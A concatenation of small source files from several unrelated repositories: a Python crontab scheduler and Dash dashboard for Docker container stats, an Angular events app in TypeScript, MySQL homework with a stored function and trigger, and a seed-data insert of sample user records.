for job in self.cron:
if job.comment == comment:
self.cron.remove(job)
print("Job removed...")
else:
self.cron.remove_all()
print('All jobs removed..')
self.cron.write()
if __name__ == '__main__':
import sys
cron = CTab('sohdatta')
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path,'test.py')
command = 'python ' + file_path
comment = 'Storing container stats in mongodb'
if len(sys.argv) > 1 and sys.argv[1] == 'remove':
cron.remove_job()
else:
cron.add_job(command,1,comment)
<file_sep>import os
from datetime import datetime
from pymongo import MongoClient
def main():
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path,'logfile')
f = open(file_path,'a')
f.write('its working: {}'.format(datetime.now()))
db = MongoClient().test
f.write("object created")
data ={'time':str(datetime.now())}
db.testingcon.insert_one(data)
f.write("document inserted")
f.close()
main()
<file_sep>#FROM ubuntu:latest
#RUN apt-get update
#RUN apt-get install -y software-properties-common vim
#RUN add-apt-repository ppa:jonathonf/python-3.6
#RUN apt-get update
#RUN apt-get install -y build-essential python3.6 python3.6-dev python3-pip python3.6-venv
#RUN python3.6 -m pip install pip --upgrade
#RUN python3.6 -m pip install wheel
FROM python:3.6
WORKDIR /app
ADD . /app
RUN pip install -r requirements.txt
RUN pip install plotly --upgrade
<file_sep>from django.shortcuts import render
from . import models
# Create your views here.
def index(request):
return render(request,'index.html')
def full_list(request):
data = models.Timestamp.objects()
return render(request,'full_list.html',{'data':data})
def detail_page(request,ts):
data = models.Timestamp.objects(time=ts)
return render(request,'detail_page.html',{'data':data})
def usage_detail_page(request,ts,name,usage=None):
data = models.Timestamp.objects(time=ts)
return render(request,'usage_detail_page.html',{'data':data,'name':name,'usage':usage})
<file_sep>if [ $1=="remove" ]
then
crontab -r
elif [ $1=="add" ]
then
file_path=$PWD/"test.py"
command="python $file_path"
crontab -l > mycron
echo "*/1 * * * * $command" >> mycron
crontab mycron
rm mycron
fi
<file_sep>import dash
from dash.dependencies import Output,Input,Event,State
import dash_core_components as dcc
import dash_html_components as html
import plotly
from dockerGuest import dockerGuest
import random
docker=dockerGuest()
app = dash.Dash(__name__)
#image_list = docker.image_list()
#----------------APP LAYOUT------------------#
app.layout = html.Div([
html.Div([
html.Div([
html.H3("Click below to see the list of containers"),
html.Div([
html.Button(id='generate-container-list',n_clicks=0,children='Show Containers',className='btn btn-primary')
],style={'marginTop':'30px'}),
html.Div([
html.P(children=[
html.H3(['Containers: ',
html.Span(id='list-length'),]),
]),
],id='div-list-length',style={'marginTop':'30px'}),
html.Div([
dcc.Dropdown(id='container-image-list',disabled=True),
]),
],className='left-row1'),
html.Div([
html.H3('Usages'),
dcc.Dropdown(
id='usages',
options=[{'label':'CPU','value':'cpu_usage'},{'label':'Memory','value':'mem_usage'}],
),
],id='left-row-2',className='left-row2',style={'display':'none'}),
],className ='col-md-2',style={'backgroundColor':'#E6E6FA','marginLeft':'-65'}),
html.Div(className='col-md-10'),
],className='container')
#---------------------------------------------#
@app.callback(Output('left-row-2','style'),
[Input('generate-container-list','n_clicks')])
def update(n_clicks):
l = len(docker.image_list())
if n_clicks > 0:
if l==0:
return {'display':'none'}
else:
return {'display':'block'}
@app.callback(Output('container-image-list','disabled'),
[Input('generate-container-list','n_clicks')])
def enable_dlist(n_clicks):
l = len(docker.image_list())
if n_clicks>0:
if l==0:
return True
else:
return False
@app.callback(Output('list-length','children'),
[Input('generate-container-list','n_clicks')])
def update(n_clicks):
if n_clicks > 0:
return '{}'.format(len(docker.image_list()))
@app.callback(Output('container-image-list','options'),
[Input('generate-container-list','n_clicks')])
def generate_list(n_clicks):
if n_clicks > 0:
return [{'label':i,'value':i} for i in docker.image_list()]
#---------------Bootstrap CSS-------------------#
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
"external_url":my_css_url
})
#------------------------------------------------#
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8888)
| a485c471f11426077bf57030c045c6b139317d09 | [
"Python",
"Text",
"Dockerfile",
"Shell"
] | 23 | Python | sohamdats/mydashapp | 20e11cceeaf0188d79a15fb44e53a17cd7a76e5f | 178c5e9fa55ba48c96b817113f9e90c0694dd24f |
refs/heads/master | <repo_name>leshij-2005/tochka-test<file_sep>/src/app/events/events.component.ts
import { Component, OnInit } from '@angular/core';
import { EventService } from './event.service';
import { Article } from '../article/article';
@Component({
selector: 'app-events',
templateUrl: './events.component.html',
styleUrls: ['./events.component.scss']
})
export class EventsComponent implements OnInit {
events = [];
sortBy:string = 'date';
constructor(private eventService: EventService) {}
getEvents(): void {
this.eventService.getEvents()
.subscribe(events => this.events = events);
}
ngOnInit() {
this.getEvents();
}
sort(type: string): void {
this.sortBy = type;
this.events.sort((a, b) => a[type] > b[type] ? 1 : -1);
}
}<file_sep>/src/app/app-routing.module.ts
import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { ArticleComponent } from './article/article.component';
import { TransactionComponent } from './transaction/transaction.component';
import { EventsComponent } from './events/events.component';
import { EventAddComponent } from './add/add.component';
const routes: Routes = [
{ path: '', redirectTo: '/events', pathMatch: 'full' },
{ path: 'events', component: EventsComponent },
{ path: 'add/:type', component: EventAddComponent },
{ path: 'article/:id', component: ArticleComponent },
{ path: 'transaction/:id', component: TransactionComponent },
];
@NgModule({
imports: [ RouterModule.forRoot(routes) ],
exports: [ RouterModule ]
})
export class AppRoutingModule {}<file_sep>/src/app/events/event.service.ts
import { Injectable } from '@angular/core';
import { Observable, of } from 'rxjs';
import { events } from './mock-events';
import { EventEmitter } from 'events';
@Injectable({
providedIn: 'root',
})
export class EventService {
events = [];
constructor() {}
getEvents(): Observable<Object[]> {
this.events = (this.events.length ? this.events : events).filter(event => !event.deleted);
return of(this.events);
}
getEvent(id: number): Observable<Object> {
if (!this.events.length) {
this.events = events;
}
return of(this.events.find(event => event.id === id))
}
updateEvent(id: number, data: Object): Observable<Object> {
return of(this.events.find(event => event.id === id));
}
deleteEvent(id: number): Observable<Object> {
return of(true);
}
addEvent(event: any): Observable<Object> {
event.date = new Date();
event.id = this.events.length + 1;
this.events.push(event);
return of(event);
}
}<file_sep>/src/app/article/article.ts
export class Article {
id: number;
date: Date;
title: string;
content: string;
isRead: boolean;
deleted: boolean;
}<file_sep>/src/app/add/add.component.ts
import { Component, OnInit, Input } from '@angular/core';
import { ActivatedRoute } from '@angular/router';
import { Location } from '@angular/common';
import { EventService } from '../events/event.service';
@Component({
selector: 'app-event-add',
templateUrl: './add.component.html',
styleUrls: ['./add.component.scss']
})
export class EventAddComponent implements OnInit {
@Input() event: any;
constructor(private route: ActivatedRoute, private eventService: EventService, private location: Location) {
this.event = {
deleted: false,
};
}
goBack(): void {
this.location.back();
}
ngOnInit(): void {
this.getType();
}
getType(): void {
const type = this.route.snapshot.paramMap.get('type');
this.event.type = type;
}
add(): void {
this.eventService.addEvent(this.event)
.subscribe(() => {
this.goBack();
});
}
}<file_sep>/src/app/transaction/transaction.ts
export class Transaction {
id: number;
date: Date;
amount: number;
currency: string;
from: string;
description: string;
direction: string;
deleted: boolean;
}<file_sep>/src/app/article/article.component.ts
import { Component, OnInit, Input } from '@angular/core';
import { ActivatedRoute } from '@angular/router';
import { Location } from '@angular/common';
import { Article } from './article';
import { EventService } from '../events/event.service';
@Component({
selector: 'app-article',
templateUrl: './article.component.html',
styleUrls: ['./article.component.scss']
})
export class ArticleComponent implements OnInit {
@Input() article: Article;
constructor(private route: ActivatedRoute, private eventService: EventService, private location: Location) {}
ngOnInit(): void {
this.get();
}
get(): void {
const id = +this.route.snapshot.paramMap.get('id');
this.eventService.getEvent(id)
.subscribe((event: Article) => this.article = event);
}
goBack(): void {
this.location.back();
}
read(): void {
this.eventService.updateEvent(this.article.id, {isRead: true})
.subscribe(() => {
this.article.isRead = true;
});
this.goBack();
}
} | 1162faca13e3a9368a38bb65746d3e23087cb44f | [
"TypeScript"
] | 7 | TypeScript | leshij-2005/tochka-test | d1e3c2dfbfeaa4ee7784f334b6b6d1f46cb80bcb | f76651cfe79946501d8ff1d6d7520c306e775495 |
refs/heads/master | <repo_name>JasonliEio/CopyMeituan<file_sep>/README.md
# CopyMeituanUI
山寨美团UI



<file_sep>/山寨团/Default/Default.h
extern NSString *const CityDidChangeNotification; //城市通知
extern NSString *const SelectCityName;
extern NSString *const SortDidChangeNotification; //排序通知
extern NSString *const SelectSort;
extern NSString *const CategoryDidChangeNotification; //分类通知
extern NSString *const SelectCategory;
extern NSString *const SelectSubCategoryName;
extern NSString *const RegionDidChangeNotification; //城市对应区域通知
extern NSString *const SelectRegion;
extern NSString *const SelectSubRegionName;
extern NSString *const CollectDidChangeNotification; //收藏控制器的通知
extern NSString *const isCollectKey; //是收藏还是取消收藏
extern NSString *const CollectDealKey; //收藏团购数据
| b7474d97f3ce6cb135e009cb7e321e5ba57887af | [
"Markdown",
"C"
] | 2 | Markdown | JasonliEio/CopyMeituan | 78a18f7b20e51f417244ff33b6184b8fd3f26358 | 2d62a5789ad48cdffe42c94e2752a27760ae4e9b |
refs/heads/main | <repo_name>Animesh810/Car_OverSpeeding_Detection_Arduino<file_sep>/Car Overspeeding Detection project.ino
/*
* The circuit:
* LCD RS pin to digital pin 26
* LCD Enable pin to digital pin 27
* LCD D4 pin to digital pin 30
* LCD D5 pin to digital pin 31
* LCD D6 pin to digital pin 32
* LCD D7 pin to digital pin 33
* LCD R/W pin to ground
* LCD VSS pin to ground
* LCD VCC pin to 5V
* 10K resistor:
* ends to +5V and ground
*/
#include <LiquidCrystal.h>
LiquidCrystal lcd(26, 27, 30, 31, 32, 33);
int trigPin1=50;
int echoPin1=51;
int trigPin2=41;
int echoPin2=40;
unsigned long time1,time2;
long timewa;
double speedwa;
long duration1, distance1;
long duration2, distance2;
void setup() {
Serial.begin (9600);
pinMode(trigPin1, OUTPUT);
pinMode(echoPin1, INPUT);
pinMode(trigPin2, OUTPUT);
pinMode(echoPin2, INPUT);
lcd.begin(16, 2);
lcd.print("Measuring!!!");
}
void loop() {
for(long i =0;i<999999;i++){
digitalWrite(trigPin1, LOW); // Added this line
delayMicroseconds(2); // Added this line
digitalWrite(trigPin1, HIGH);
delayMicroseconds(10); // Added this line
digitalWrite(trigPin1, LOW);
duration1 = pulseIn(echoPin1, HIGH);
distance1 = (duration1/2) / 29.1;
if (distance1 <= 30 and distance1 >= 1){
time1 = millis();
break;
}
else {
// Serial.print ( "Sensor1 ");
// Serial.print ( distance1);
// Serial.println("cm");
}
}
// delay(1);
for(long j=0;j<999999;j++){
digitalWrite(trigPin2, LOW); // Added this line
delayMicroseconds(2); // Added this line
digitalWrite(trigPin2, HIGH);
delayMicroseconds(10); // Added this line
digitalWrite(trigPin2, LOW);
duration2 = pulseIn(echoPin2, HIGH);
distance2= (duration2/2) / 29.1;
if (distance2 <= 30 and distance2 >= 1){
time2 = millis();
break;
// Serial.print("Speed ");
// Serial.print(speedwa);
// Serial.println("cm/s");
}
else {
// Serial.print("Sensor2 ");
// Serial.print(distance2);
// Serial.println("cm");
}
}
lcd.clear();
timewa = time2 - time1;
speedwa = 15000.00/timewa;
Serial.print("Speed ");
Serial.print(speedwa);
Serial.println("cm/s");
lcd.setCursor(0,0);
lcd.print("Speed in cm/s");
lcd.setCursor(0,1);
lcd.print(speedwa);
/* Serial.print("time difference ");
Serial.print(time2-time1);
Serial.println("ms");
*/
if(speedwa >= 100){
lcd.clear();
lcd.setCursor(0,0);
lcd.print("ALERT!!!!!");
lcd.setCursor(0,1);
lcd.print("OVERSPEEDING ");
delay(1000);
lcd.clear();
lcd.setCursor(0,0);
lcd.print("Speed in cm/s");
lcd.setCursor(0,1);
lcd.print(speedwa);
}
else{
delay(1000);
lcd.clear();
}
//delay(1000);
//lcd.clear();
}
<file_sep>/README.md
# Car_OverSpeeding_Detection_Arduino
The Code is for Car Over Speeding Detection project on Arduino.
The project utilises HC-SR04 ultrasonic sensors and prints the speed of the car on a LCD display.
Refer to the report for more details.
| c23b5a127663cea0d209e9de92cd88cf14e8a0a7 | [
"Markdown",
"C++"
] | 2 | C++ | Animesh810/Car_OverSpeeding_Detection_Arduino | 232b8af631224f8f1b6be2767600e8ec4ff77065 | 47648f0a80ad43d92354c54d9421dbb6427e3c62 |
refs/heads/main | <file_sep>-- Хранимые процедуры и функции, триггеры
-- 1.Создайте хранимую функцию hello(), которая будет возвращать приветствие, в зависимости от текущего времени суток.
-- С 6:00 до 12:00 функция должна возвращать фразу "Доброе утро", с 12:00 до 18:00 функция должна возвращать фразу
-- "Добрый день", с 18:00 до 00:00 — "Добрый вечер", с 00:00 до 6:00 — "Доброй ночи".
drop function if exists `hello`;
delimiter //
create function `hello`()
returns text not deterministic
begin
declare currenttime TIME; -- VARCHAR(255);
set currenttime = curtime(); -- DATE_FORMAT(NOW(), "%H:%i:%s");
case
when currenttime between '06:00:01' and '12:00:00' then return "Доброе утро";
when currenttime between '12:00:01' and '18:00:00' then return "Добрый день";
when currenttime between '18:00:01' and '00:00:00' then return "Добрый вечер";
when currenttime between '00:00:01' and '06:00:00' then return "Доброй ночи";
end case;
end//
select hello()//
delimiter ;
-- не работает, пробовала разные варианты, все время ошибки
-- SQL Error [1418] [HY000]: This function has none of DETERMINISTIC, NO SQL, or READS SQL DATA in its declaration and binary logging is enabled (you *might* want to use the less safe log_bin_trust_function_creators variable)
-- 2.В таблице products есть два текстовых поля: name с названием товара и description с его описанием.
-- Допустимо присутствие обоих полей или одно из них. Ситуация, когда оба поля принимают неопределенное
-- значение NULL неприемлема. Используя триггеры, добейтесь того, чтобы одно из этих полей или оба поля были заполнены.
-- При попытке присвоить полям NULL-значение необходимо отменить операцию.
use homework;
delimiter //
create trigger null_trigger BEFORE INSERT ON products
FOR EACH ROW BEGIN
IF NEW.name IS NULL AND NEW.description IS NULL THEN
SIGNAL SQLSTATE '45000'
SET MESSAGE_TEXT = 'NULL-alert';
END IF;
END//
delimiter ;
INSERT INTO products (name, description, price, catalog_id)
VALUES (NULL, NULL, 100500, 8);<file_sep>use snet0611;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Дарья','Попова','<EMAIL>',8151557164,'f','1984-11-28','Воронеж',NULL,'32afa0b02c8399d1960509c3fbd4cc75ab4dcce2','2020-09-25 22:09:27.0')
,('Ирина','Гончарова','<EMAIL>',2907266453,'f','1984-08-24','Самара',NULL,'afd3e457d3b9f6f880623163ea8f72889777a58b','2020-09-25 22:09:27.0')
,('Марина','Закусилова','<EMAIL>',5949091863,'f','1981-04-16','Новосибирск',NULL,'9154186410a62369bdf4fd2bd632ca3511b270a7','2020-09-25 22:09:27.0')
,('Елена','Нагина','<EMAIL>',6966471579,'f','1988-08-10','Пермь',NULL,'9bc443a6e52541784d52b69acc39343526886b11','2020-09-25 22:09:27.0')
,('Валерия','Платошкина','<EMAIL>',1078902682,'f','1980-01-07','Красноярск',NULL,'229aedb0a417bccab3ee0cbd89a4b1afaa080c51','2020-09-25 22:09:27.0')
,('Станислав','Светляков','<EMAIL>',9642922963,'m','1984-05-19','Тюмень',NULL,'584b9241b06cfe87131bfdba7b53e877ec3bd940','2020-09-25 22:09:27.0')
,('Ирина','Черникова','<EMAIL>',3118473791,'f','1982-10-20','Екатеринбург',NULL,'129797dcb95127ce0541faa8d91d8f1969da0f45','2020-09-25 22:09:27.0')
,('Алиса','Зайцева','<EMAIL>',4568198247,'f','1989-04-03','Воронеж',NULL,'ea63b484704b7a8316da4025260b864453adb948','2020-09-25 22:09:27.0')
,('Ольга','Застрожнова','<EMAIL>',9259428337,'f','1983-05-07','Москва',NULL,'9b1f31426e9caf75d46b9b4a7c58c1941daa33f0','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Ирина','Сушкова','<EMAIL>',9442875153,'f','1984-12-19','Волгоград',NULL,'9d0f9f7cdbe467af211a5d5bc91e2e16da891521','2020-09-25 22:09:27.0')
,('Анна','Бавыкина','<EMAIL>',6774820315,'f','1982-04-19','Казань',NULL,'3866567f83079af02f517913d98a34e8a5514111','2020-09-25 22:09:27.0')
,('Марина','Киреева','<EMAIL>',4056088011,'f','1984-04-26','Казань',NULL,'37cda6f77b46bb92ebfea535bdd89d6a145ee28a','2020-09-25 22:09:27.0')
,('Елена','Михайлова','<EMAIL>',2159168663,'f','1980-02-08','Красноярск',NULL,'340287d956987900a051e920136b2c1c17351321','2020-09-25 22:09:27.0')
,('Любовь','Чиликова','<EMAIL>',2619617364,'f','1983-11-22','Тольятти',NULL,'d4a54226f86124d38f463d60c3658a32be191e0e','2020-09-25 22:09:27.0')
,('Елена','Селиванова','<EMAIL>',1315489478,'f','1982-03-27','Волгоград',NULL,'4cbd30f625fd3440804baf6f509246e8ff81d46b','2020-09-25 22:09:27.0')
,('Сергей','Лисовой','<EMAIL>',1253462931,'m','1988-08-03','Краснодар',NULL,'89d65795895ed1c2f48114474ef37c92e1796dee','2020-09-25 22:09:27.0')
,('Михаил','Назарьев','<EMAIL>',8696039405,'m','1984-06-06','Волгоград',NULL,'011af674acb2a19440bb6a013d33dd9a231d53a4','2020-09-25 22:09:27.0')
,('Алексей','Метлицкий','<EMAIL>',2981339919,'m','1980-04-24','Краснодар',NULL,'e3e589b0cc498fb982ed1cbae5d20d3766e97b36','2020-09-25 22:09:27.0')
,('Эльвира','Белоусова','<EMAIL>',4051023201,'f','1987-12-19','Челябинск',NULL,'2def62b6a77064a15b157222f1b43bb538a0293e','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Екатерина','Власова','<EMAIL>',7146665929,'f','1984-04-11','Краснодар',NULL,'eb7fabdc4b4f70445a27467544e2a742dfad7bbb','2020-09-25 22:09:27.0')
,('Юрий','Волчкевич','<EMAIL>',5826283675,'m','1981-10-15','Воронеж',NULL,'1e65c000a98a92396d4ef31ec8d7740cbf578830','2020-09-25 22:09:27.0')
,('Евгений','Волынкин','<EMAIL>',9707035248,'m','1981-03-19','Саратов',NULL,'3627f911a7a4141f007ff0d25aa85f061f734742','2020-09-25 22:09:27.0')
,('Владимир','Воробьев','<EMAIL>',8788528067,'m','1980-06-23','Красноярск',NULL,'0be3ef277eac3ac46d547b579848cea67e075952','2020-09-25 22:09:27.0')
,('Дмитрий','Лопухов','<EMAIL>',7107508285,'m','1983-11-03','Нижний Новгород',NULL,'5d3e5e579aa758ea28c1f53a6de174ee1f714701','2020-09-25 22:09:27.0')
,('Ольга','Лохмачева','<EMAIL>',6146928162,'f','1980-01-23','Самара',NULL,'f89b2d6443e511fd742d16a5404b19d541f89f10','2020-09-25 22:09:27.0')
,('Маргарита','Овчинникова','<EMAIL>',5013560236,'f','1981-05-20','Казань',NULL,'14aac374085e2782a8f1510f1bf49722b040731c','2020-09-25 22:09:27.0')
,('Вячеслав','Погорельский','<EMAIL>',6068012327,'m','1988-01-05','Пермь',NULL,'5530cf46cf0b1b5e787723e83012f93a5cd6b832','2020-09-25 22:09:27.0')
,('Владимир','Полищук','<EMAIL>',6081230164,'m','1987-10-25','Ростов-на-Дону',NULL,'7ee4a9f5be784f551cfcb2d23698bc31b4e4069f','2020-09-25 22:09:27.0')
,('Игорь','Токарев','<EMAIL>',8843970434,'m','1985-07-08','Новосибирск',NULL,'a430faa2a1494af65cfa7cd72a7f46e1fad301c6','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Евгений','Турбин','<EMAIL>',6414312198,'m','1987-08-18','Москва',NULL,'1fa46ebf47f51c03b98c8379934b4b0182853ec3','2020-09-25 22:09:27.0')
,('Анна','Колтакова','<EMAIL>',9059884608,'f','1989-03-04','Пермь',NULL,'e59558fde6118d3eb58c5b624bedf28b41da0ac7','2020-09-25 22:09:27.0')
,('Максим','Попов','<EMAIL>',6549392162,'m','1989-05-01','Санкт-Петербург',NULL,'1bc1a0536d38b6216b74a2819436ba0a925206c8','2020-09-25 22:09:27.0')
,('Юлия','Черепнина','<EMAIL>',8361146361,'f','1982-04-09','Самара',NULL,'47c16b5079e4409b613bcedfe75fcfa8c486963f','2020-09-25 22:09:27.0')
,('Андрей','Мошкин','<EMAIL>',7586396136,'m','1980-04-06','Екатеринбург',NULL,'ebb1057b6e438535963f3706ba15dd6a2df8926b','2020-09-25 22:09:27.0')
,('Евгений','Бучнев','<EMAIL>',8482399498,'m','1982-01-29','Тюмень',NULL,'9aeec57f845984b9ec57d44acd8d4990b2f21824','2020-09-25 22:09:27.0')
,('Екатерина','Кретинина','<EMAIL>',5605843880,'f','1989-07-09','Пермь',NULL,'b1ac483a02563c28d48284145535076aa39931ab','2020-09-25 22:09:27.0')
,('Павел','Трунтаев','<EMAIL>',8608680584,'m','1986-03-07','Уфа',NULL,'e430a8c6a2f7272b9e5f295a7ecac609555be589','2020-09-25 22:09:27.0')
,('Юлия','Печенкина','<EMAIL>',1682297034,'f','1987-03-26','Краснодар',NULL,'8ac622757e94e702a3798d851b21d6d1d3ee5450','2020-09-25 22:09:27.0')
,('Михаил','Хрипков','<EMAIL>',4765849891,'m','1987-02-04','Новосибирск',NULL,'44c2349e85e97eda950d824a82ab37c2da75bf92','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Ольга','Черникова','<EMAIL>',3659256004,'f','1980-07-25','Самара',NULL,'151acd87edd4c6d68ce4a92bc846f2abeae49b8e','2020-09-25 22:09:27.0')
,('Максим','Бахтерев','<EMAIL>',7849899275,'m','1986-12-27','Санкт-Петербург',NULL,'4613c2845f696b03d37b801e0cdab710fb6beaea','2020-09-25 22:09:27.0')
,('Екатерина','Попова','<EMAIL>',9788815521,'f','1989-01-09','Нижний Новгород',NULL,'3a4548bbbbed1c9d604750295dd22b34b706427f','2020-09-25 22:09:27.0')
,('Марина','Свиридова','<EMAIL>',7449749232,'f','1982-12-26','Казань',NULL,'07dc7b613035be338b2d299bf481d9ced8731129','2020-09-25 22:09:27.0')
,('Сергей','Цурканов','<EMAIL>',9461404246,'m','1985-07-24','Казань',NULL,'4f2d890e00efe71d86b23d64aa3ab7c7f6c2262b','2020-09-25 22:09:27.0')
,('Алла','Толмачева','<EMAIL>',5057501481,'f','1984-08-18','Омск',NULL,'cd21e4ceb76f06cbe1d3ecd30345701dfc01f28c','2020-09-25 22:09:27.0')
,('Алексей','Суворов','<EMAIL>',2034001863,'m','1984-08-12','Санкт-Петербург',NULL,'7fe1c2e54c91bb20754abe19f3633ecb294f69ce','2020-09-25 22:09:27.0')
,('Виталия','Бредихина','<EMAIL>',5033419317,'f','1988-09-01','Пермь',NULL,'a1313b86956b58564bf1bc069cfdeaec107b235b','2020-09-25 22:09:27.0')
,('Елена','Бумакова','<EMAIL>',6621801231,'f','1987-01-10','Москва',NULL,'b29ff9bce316ab42dfe8b8ae997b551fd05ba3a4','2020-09-25 22:09:27.0')
,('Галина','Максимова','<EMAIL>',9315587169,'f','1988-05-14','Уфа',NULL,'3f88873d6babca57eb1c5371be6a431c415c6ae5','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Евгения','Мельченко','<EMAIL>',2634109732,'f','1981-07-24','Самара',NULL,'af711421307bf3ea53e2a1fd5c7cdc47bc0464d4','2020-09-25 22:09:27.0')
,('Татьяна','Переславцева','<EMAIL>',9437670910,'f','1985-08-23','Омск',NULL,'6da0975df3909e3928a20d54fbbca3c0361ff060','2020-09-25 22:09:27.0')
,('Татьяна','Ситало','<EMAIL>',2822890926,'f','1988-02-03','Санкт-Петербург',NULL,'e02ed0156bcadbc65c407e4f6d0c907449dcfb49','2020-09-25 22:09:27.0')
,('Ирина','Анисимова','<EMAIL>',6667018887,'f','1989-11-15','Нижний Новгород',NULL,'e08d50568524e1712fd178b2d453eccaec3497d9','2020-09-25 22:09:27.0')
,('Наталья','Домарева','<EMAIL>',4094890532,'f','1985-09-18','Уфа',NULL,'52bb52432e2afd23c8da1f5587ba6dcfc5321b3e','2020-09-25 22:09:27.0')
,('Ирина','Сидельникова','<EMAIL>',3198003378,'f','1988-03-18','Красноярск',NULL,'ecabdafeec47fe7ae2303f3482e875ec47a504aa','2020-09-25 22:09:27.0')
,('Ираида','Воронюк','<EMAIL>',6147416992,'f','1983-04-04','Москва',NULL,'efaf246cf8b3e0fe4795e9a6bc33e852dcf76bb2','2020-09-25 22:09:27.0')
,('Юлия','Азарова','<EMAIL>',5283489590,'f','1983-10-13','Казань',NULL,'c7f7a47fbda0cd6cd1e0d34265521b26dd561592','2020-09-25 22:09:27.0')
,('Мария','Ефимова','<EMAIL>',9077450643,'f','1988-06-04','Казань',NULL,'2cddeecac91feeb2f03c5b2eb5a0cda8407bf25b','2020-09-25 22:09:27.0')
,('Юлия','Кондратьева','<EMAIL>',4854790930,'f','1981-07-19','Уфа',NULL,'1e570efd00e3262785cf1dcd9eb0dc4ecb6a213d','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Юлия','Косарева','<EMAIL>',5239735195,'f','1987-11-04','Новосибирск',NULL,'659c44b7d1deec5ba15d5c2a24345a655f536cf8','2020-09-25 22:09:27.0')
,('Ирина','Лакомова','<EMAIL>',8902784216,'f','1981-11-11','Санкт-Петербург',NULL,'b48da6b9f87aa771566ab1d75cb69081105f6a50','2020-09-25 22:09:27.0')
,('Анна','Полуэктова','<EMAIL>',8414878509,'f','1981-10-20','Уфа',NULL,'2d10eec8cdac3f29976908c3efa65aed77028732','2020-09-25 22:09:27.0')
,('Ольга','Никулина','<EMAIL>',9347973825,'f','1989-09-28','Омск',NULL,'8113bb2b1039acc5d314fb74840c11963c2d0671','2020-09-25 22:09:27.0')
,('Юлия','Максименко','<EMAIL>',4777653528,'f','1987-11-29','Новосибирск',NULL,'49c2e20c7e932772449c133770fcb6fababacdae','2020-09-25 22:09:27.0')
,('Татьяна','Асеева','<EMAIL>',9035161534,'f','1989-05-27','Волгоград',NULL,'5009a649664092e862d0eaaf055391e453889bbb','2020-09-25 22:09:27.0')
,('Екатерина','Шипилова','<EMAIL>',4366159925,'f','1984-11-30','Пермь',NULL,'94b83db9e43e7aed7fa9bcf13adc71aa179f89cb','2020-09-25 22:09:27.0')
,('Елена','Янкова','<EMAIL>',7266747785,'f','1988-11-26','Новосибирск',NULL,'2cee62ceb700cc6f95e628d60a75b17b1732ef65','2020-09-25 22:09:27.0')
,('Евгений','Красавин','<EMAIL>',7366490172,'m','1984-10-16','Ростов-на-Дону',NULL,'b02744a3459bf40c24434c311c7028547ad70889','2020-09-25 22:09:27.0')
,('Анна','Яньшина','<EMAIL>',8016989162,'f','1984-11-18','Воронеж',NULL,'3314213f61429d374db27ef36b8caf681f649050','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Наталья','Мироненко','<EMAIL>',5606350937,'f','1986-07-13','Екатеринбург',NULL,'012724188466775fd1b41ce9803a36dca24a63b6','2020-09-25 22:09:27.0')
,('Людмила','Дадонова','<EMAIL>',9375852898,'f','1982-06-07','Краснодар',NULL,'9f3614ed85067d90f9a882975f6a8d4dfc3f43df','2020-09-25 22:09:27.0')
,('Ольга','Мордасова','<EMAIL>',6523490247,'f','1981-01-16','Краснодар',NULL,'44ffb111616d23edfc480f0639b63d4d065147aa','2020-09-25 22:09:27.0')
,('Елена','Рыжкова','<EMAIL>',5301390113,'f','1986-06-25','Новосибирск',NULL,'c5e9fcc1e5c3991df06be270bdc1ccb4cd8c5ac1','2020-09-25 22:09:27.0')
,('Екатерина','Богомолова','<EMAIL>',8271364242,'f','1982-03-10','Пермь',NULL,'99d6158bc261ca00d6dcf348dbf9ea368a1ae46b','2020-09-25 22:09:27.0')
,('Марина','Голощапова','<EMAIL>',3192842536,'f','1988-06-07','Москва',NULL,'7ba41712fe6615ae0cf36ee45daf697ccb143563','2020-09-25 22:09:27.0')
,('Инна','Дибцева','<EMAIL>',4447992090,'f','1986-12-17','Ростов-на-Дону',NULL,'3d7d5ac699eef8151fe1b7bfd533a321b56bb59d','2020-09-25 22:09:27.0')
,('Дмитрий','Попов','<EMAIL>',7897075774,'m','1981-08-23','Ростов-на-Дону',NULL,'176936e9534c8e4b7fa4e2823745770ee0b64880','2020-09-25 22:09:27.0')
,('Галина','Рукавицына','<EMAIL>',2396829153,'f','1986-03-14','Новосибирск',NULL,'e396e8928248b9331ee11b9c0c5a4653d6ad2fad','2020-09-25 22:09:27.0')
,('Никита','Рыкунов','<EMAIL>',8866042922,'m','1981-09-03','Москва',NULL,'5750b294231512ca402800e4eef400036e08507d','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Анастасия','Рыкунова','<EMAIL>',9518059825,'f','1989-06-12','Красноярск',NULL,'deb3e4b9c818260e9adf17b225f45234390713cf','2020-09-25 22:09:27.0')
,('Юрий','Саблин','<EMAIL>',9061846141,'m','1988-02-24','Тюмень',NULL,'dc4a7a560f689bf62ddc9aa22bbd64becceffca6','2020-09-25 22:09:27.0')
,('Алексей','Самсонов','<EMAIL>',6284148195,'m','1981-07-20','Екатеринбург',NULL,'3b802df74686705a1d5ed6c253b0d588bb02103c','2020-09-25 22:09:27.0')
